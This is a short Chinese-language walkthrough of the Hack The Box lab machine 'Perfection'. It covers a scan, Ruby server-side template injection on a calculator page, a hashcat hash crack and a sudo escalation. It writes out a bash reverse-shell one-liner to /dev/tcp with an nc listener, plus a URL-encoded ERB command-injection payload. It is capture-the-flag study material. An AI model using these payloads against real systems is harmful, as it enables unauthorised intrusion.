Hack The Box——Perfection笔记

机器名称：Perfection

难度：easy

首先使用nmap进行扫描可知开启了web服务和ssh服务

访问web网站，找到一个计算页面

 

并且通过信息收集可知，此网站为ruby语言开发，所以尝试ssti注入，发现存在ssti注入

 

我们将payload先进行编码

hURL -B "bash -i >& /dev/tcp/IP/7373 0>&1"

hURL -U "BASE64"

 

开启端口监听nc -lvnp 7373

然后将payload传入获取shell

（此处也可直接抓包输入执行命令进行后续操作，例如KK%0A<%25%3d+`ls`+%25>）

成功找到user.txt

通过信息收集可获得susan的hash值

并且找到了hash原文的组成部分

于是使用hashcat进行爆破得到密码

通过最初的扫描可知ssh服务开启，于是登陆ssh

 

使用sudo su，密码与上面密码相同，然后查看root.txt即可。